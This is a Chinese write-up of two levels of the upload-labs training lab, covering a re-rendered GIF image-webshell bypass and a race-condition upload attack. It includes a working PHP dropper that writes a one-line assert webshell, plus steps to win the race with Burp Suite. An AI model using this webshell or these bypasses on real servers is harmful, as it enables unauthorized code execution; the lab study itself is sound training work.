文件上传漏洞第十六关十七关

第十六关

第十七关


第十六关

直接上传php文件判断限制方式:

同第十五关白名单限制

第十六关源码

代码逻辑判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染

二次渲染图片马:upload-labs之pass 16详细分析 - 先知社区

绕过思路:

1、把经过二次渲染的图片进行捆绑webshell图片马,文件上传时候 文件名为.gif后缀、文件类型content-type:image/gif、文件头GIF89a

推荐使用gif格式,十六进制编辑图片文件找到二次渲染未修改的图片区域插入一句话木马

第十七关

直接上传php文件判断限制方式:

第十七关源码

代码逻辑:

  • 这里先将文件上传到服务器,然后通过rename修改名称,再通过unlink删除文件,因此可以通过条件竞争的方式在unlink之前,访问webshell

绕过思路:

1、条件竞争绕过上传webshell

上传一个fputs写入shell文件功能的webshell,通过python或者burpsuite访问该文件

f.php文件内容

复制代码
<?php fputs(fopen('shell.php','w'),'<?php @assert($_POST[c]);?>'); ?>

burpsuite抓包:通过爆破形式不断的进行文件上传

burpsuite抓包:通过爆破形式不断的访问该文件

相关推荐
☆firefly☆1 小时前
[MRCTF2020]ezpop wp
web安全·网络安全
世界尽头与你2 天前
MacOS红队常用攻击命令
安全·macos·网络安全
游戏开发爱好者82 天前
使用克魔助手查看iOS 应用程序使用历史记录和耗能历史记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
jingshaoyou3 天前
【11】Strongswan processor 详解1
网络·网络安全
拾柒SHY3 天前
WEB安全-CTF中的PHP反序列化漏洞
web安全·网络安全
白猫a٩3 天前
记一次某网络安全比赛三阶段webserver应急响应解题过程
安全·web安全·网络安全
浩浩测试一下3 天前
网络安全中信息收集需要收集哪些信息了?汇总
安全·web安全·网络安全·oracle·sqlite·系统安全·可信计算技术
一口一个橘子3 天前
[ctfshow web入门] web40
前端·web安全·网络安全
Alfadi联盟 萧瑶3 天前
文件上传、读取与包含漏洞解析及防御实战
网络安全
网络安全工程师老王3 天前
clickhouse注入手法总结
数据库·clickhouse·web安全·网络安全·信息安全